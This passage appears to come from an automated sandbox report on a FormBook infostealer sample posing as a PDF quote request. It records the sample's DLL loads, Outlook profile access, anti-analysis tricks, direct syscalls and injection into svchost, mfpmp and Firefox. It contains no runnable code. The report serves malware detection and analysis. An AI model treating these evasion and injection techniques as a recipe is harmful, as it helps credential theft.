            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: ksuser.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfperfhelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: rtworkq.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic file information: File size 1201152 > 1048576
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: MFPMP.pdb source: svchost.exe, 00000001.00000003.1816537651.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816611122.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816626743.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000003.1786946064.00000000008D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdbUGP source: svchost.exe, 00000001.00000003.1816537651.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816611122.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816626743.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000003.1786946064.00000000008D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1721005200.0000000003990000.00000004.00001000.00020000.00000000.sdmp, RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1719916318.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753780868.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1752145219.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.000000000319E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1851818515.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1849172802.0000000003026000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.000000000351E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.0000000003380000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1721005200.0000000003990000.00000004.00001000.00020000.00000000.sdmp, RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1719916318.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753780868.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1752145219.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.000000000319E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1851818515.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1849172802.0000000003026000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.000000000351E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.0000000003380000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4182184058.00000000039AC000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927508589.0000000002F3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2147066746.000000003ED0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4182184058.00000000039AC000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927508589.0000000002F3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2147066746.000000003ED0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7eCxfcmGdXWQyF2L.exe, 00000002.00000000.1770561912.000000000027F000.00000002.00000001.01000000.00000004.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4180628766.000000000027F000.00000002.00000001.01000000.00000004.sdmp
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeFile created: \rfq - 1239- persian gulf bidboland pdh project-pdf.exe
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeFile created: \rfq - 1239- persian gulf bidboland pdh project-pdf.exeJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeAPI/Special instruction interceptor: Address: E52CC4
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\mfpmp.exeWindow / User API: threadDelayed 5311Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeWindow / User API: threadDelayed 4661Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7912Thread sleep count: 5311 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7912Thread sleep time: -10622000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7912Thread sleep count: 4661 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7912Thread sleep time: -9322000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe TID: 8164Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe TID: 8164Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe TID: 8164Thread sleep time: -49500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe TID: 8164Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe TID: 8164Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mfpmp.exeLast function: Thread delayed
            Source: 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4181276821.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2148974489.000001E9BEBDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mfpmp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mfpmp.exeThread register set: target process: 7316Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\mfpmp.exeThread APC queued: target process: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2404008Jump to behavior
            Source: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\7eCxfcmGdXWQyF2L.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 7eCxfcmGdXWQyF2L.exe, 00000002.00000002.4181322733.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000000.1770986747.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927313392.0000000001550000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: 7eCxfcmGdXWQyF2L.exe, 00000002.00000002.4181322733.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000000.1770986747.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927313392.0000000001550000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: 7eCxfcmGdXWQyF2L.exe, 00000002.00000002.4181322733.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000000.1770986747.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927313392.0000000001550000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: 7eCxfcmGdXWQyF2L.exe, 00000002.00000002.4181322733.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000000.1770986747.0000000000E40000.00000002.00000001.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927313392.0000000001550000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1848742069.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849026159.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
